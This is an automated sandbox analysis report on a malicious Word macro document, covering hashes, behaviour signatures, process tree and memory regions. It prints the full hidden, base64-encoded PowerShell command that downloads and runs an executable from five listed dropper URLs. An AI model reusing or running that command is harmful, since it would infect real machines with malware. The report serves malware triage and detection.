Overview

overview

10

Static

static

8

390bf5b77f...18.doc

windows7-x64

10

390bf5b77f...18.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    12-05-2024 07:53

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    390bf5b77fc9c164be934a2f12be7a36_JaffaCakes118.doc

  • Size

    245KB

  • MD5

    390bf5b77fc9c164be934a2f12be7a36

  • SHA1

    fb8a2b7b10b82dee2509c68d1ce66f9674be0f32

  • SHA256

    c984833db58812ed08f1b0560576ec19bfec60b0a8103292c206042ef12007fc

  • SHA512

    dfcea8972d66e3bdee273af26ad1add17c0fd6fdd4d072672277df8eaac704d7dc67cd6f0d699fd232f009c08190e3e99ac6a076efd458125fcae0d6ccaaa406

  • SSDEEP

    6144:H0Rum7mdLRp1bbSBIR/EHGtCMXgTo8qoFt/etg+Bzm8tigUE+w6:H0E3dxtR/iU9mvUPBS8tigUE+L

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://amelano.net/wp-includes/css/dist/2ew/
exe.dropper

http://911concept.com/images/i6ngX5/
exe.dropper

http://ayonschools.com/UBkoqn/
exe.dropper

http://beech.org/wayne/lldo/
exe.dropper

http://firelabo.com/wp-includes/mf6f4/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 9 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\390bf5b77fc9c164be934a2f12be7a36_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2816
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1996
    • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
      Powershell -w hidden -en JABXAGgAaAB2AGQAeAByAGIAcQB3AGwAawBmAD0AJwBBAG8AawBqAHMAdgBuAGcAcgBsAGsAZABrACcAOwAkAEQAYQBiAHcAZwByAGwAcwBjAGIAbgB1AGQAIAA9ACAAJwAyADYANwAnADsAJABXAGkAcwBhAGwAeABuAGcAeQBtAHkAawA9ACcASABmAHIAZABhAHoAagB1AG0AYwBqAGIAcAAnADsAJABQAHEAegBvAHEAeABzAGYAaQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQARABhAGIAdwBnAHIAbABzAGMAYgBuAHUAZAArACcALgBlAHgAZQAnADsAJABUAGgAdQBwAGEAbwBiAG4AegBuAGMAYgA9ACcARwB3AGMAZwB3AGUAZQBtAGcAZgAnADsAJABSAHQAZwBsAHAAagBiAHUAbAA9ACYAKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AJwArACcAbwBiAGoAZQBjAHQAJwApACAATgBFAFQALgBXAEUAYgBjAGwASQBFAE4AdAA7ACQAWQB6AHUAZABqAGYAbQBrAHkAPQAnAGgAdAB0AHAAOgAvAC8AYQBtAGUAbABhAG4AbwAuAG4AZQB0AC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AYwBzAHMALwBkAGkAcwB0AC8AMgBlAHcALwAqAGgAdAB0AHAAOgAvAC8AOQAxADEAYwBvAG4AYwBlAHAAdAAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwBpADYAbgBnAFgANQAvACoAaAB0AHQAcAA6AC8ALwBhAHkAbwBuAHMAYwBoAG8AbwBsAHMALgBjAG8AbQAvAFUAQgBrAG8AcQBuAC8AKgBoAHQAdABwADoALwAvAGIAZQBlAGMAaAAuAG8AcgBnAC8AdwBhAHkAbgBlAC8AbABsAGQAbwAvACoAaAB0AHQAcAA6AC8ALwBmAGkAcgBlAGwAYQBiAG8ALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAG0AZgA2AGYANAAvACcALgAiAFMAYABQAEwAaQB0ACIAKAAnACoAJwApADsAJABDAHcAcAByAGoAaABjAG8AZQBmAD0AJwBaAGcAZgBzAHIAcQB5AHkAZgBqAGcAZgAnADsAZgBvAHIAZQBhAGMAaAAoACQAUgBmAHgAdgBmAHcAdwBvAGMAeQBjAHcAdwAgAGkAbgAgACQAWQB6AHUAZABqAGYAbQBrAHkAKQB7AHQAcgB5AHsAJABSAHQAZwBsAHAAagBiAHUAbAAuACIAZABPAHcAYABOAEwAYABPAGEAZABGAGAAaQBMAEUAIgAoACQAUgBmAHgAdgBmAHcAdwBvAGMAeQBjAHcAdwAsACAAJABQAHEAegBvAHEAeABzAGYAaQApADsAJABUAGcAbgBoAGEAbwBuAHAAbQBlAHgAaQA9ACcAWQBwAGYAYQBzAGcAaABwAHkAbAB1AHEAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAnACsAJwAtAEkAdABlACcAKwAnAG0AJwApACAAJABQAHEAegBvAHEAeABzAGYAaQApAC4AIgBMAGUAYABOAEcAdABIACIAIAAtAGcAZQAgADIANQA4ADUAOQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAGAAVABBAFIAVAAiACgAJABQAHEAegBvAHEAeABzAGYAaQApADsAJABTAHEAawBrAG4AbwB3AGEAdwA9ACcASQBqAHUAYgB2AGoAbQBkAHoAcQBkACcAOwBiAHIAZQBhAGsAOwAkAEEAbwBlAGgAYgBuAGsAaABqAGoAdAA9ACcAWABxAGcAYgBvAGoAdgBjAHkAeAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABRAGsAZABlAGQAcABwAGsAeABrAHoAawBvAD0AJwBVAGkAeQBhAGEAbQBpAG0AdwB4ACcA
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2564

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      b84b8b8d2076508a4ae89e47f3b54c7f

      SHA1

      929f1665ef364eb3a95a78cfdd99cd6439e42610

      SHA256

      1949e2e27f0aa0e3cf3021013e90b31cb8e49099168c6070b0148949c0306b70

      SHA512

      4f72ff99ab465b9bfa685ef79c025c2233c4c196abe2f10e1811db30cacf6339efa00fa5590fb67f57e53dac06834e208f27b45acf07a9c6d1e643e8acf7f334

      Download Submit

    • memory/2564-24-0x000000001B660000-0x000000001B942000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2564-25-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2816-13-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2816-16-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2816-9-0x0000000006E30000-0x0000000006F30000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2816-11-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2816-12-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2816-10-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2816-15-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2816-0-0x000000002F951000-0x000000002F952000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2816-18-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2816-8-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2816-7-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2816-2-0x0000000070F4D000-0x0000000070F58000-memory.dmp

      Filesize

      44KB

      Download

    • memory/2816-33-0x0000000070F4D000-0x0000000070F58000-memory.dmp

      Filesize

      44KB

      Download

    • memory/2816-34-0x0000000000390000-0x0000000000490000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2816-35-0x0000000006E30000-0x0000000006F30000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2816-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2816-51-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2816-52-0x0000000070F4D000-0x0000000070F58000-memory.dmp

      Filesize

      44KB

      Download